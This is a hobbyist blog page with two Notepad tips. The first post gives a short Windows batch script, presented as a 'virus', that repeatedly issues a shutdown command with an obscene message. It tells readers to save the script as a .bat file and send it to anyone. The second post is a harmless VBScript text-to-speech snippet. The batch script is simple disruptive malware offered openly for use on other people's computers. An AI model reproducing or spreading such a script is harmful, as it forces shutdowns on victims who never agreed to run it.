Pages

Translate

Showing posts with label Notepad. Show all posts
Showing posts with label Notepad. Show all posts

Friday 26 July 2013

Create Virus using Notepad

Posted by M Qasim A Siddiqui
How to create or make or write virus are most common question running in or mind if we are a new learner...This is very simple i have given u a small virus code which creates a highly effected virus.....



@echo
:virus
echo VIIIIIRRRRUUUUSSSS


shutdown -s -t 200 -c "YOU'RE FUCKED"
goto virus


copy and paste the above code into word pad and save its as .bat file and send the file to whom ever u want

Actually if u save this file in word pad it saves as a .doc file but to save it as a .bat file u have to save it as "virus.bat" within double quotes instead of virus u can write any name..

Saturday 6 April 2013

Convert Text Into Audio Using Notepad


How To Do It ?



  1. Open Notepad file on your Windows PC.
  2. Copy and paste the below mentioned code :

      Dim msg, sapi
      msg=InputBox("Enter your text for conversion–www.techvorm.com","TechVorm Text-To-Audio Converter")
      Set sapi=CreateObject("sapi.spvoice")
      sapi.Speak msg
  3. Save this file with any name with .vbs as extension. For eg. Text-To-Audio.vbs


Thats it ! Your Text to Audio converter is ready to be used. Now open the saved file and key in the text you want to convert and click OK. If you find any difficulties in using this code, let me know via comments section.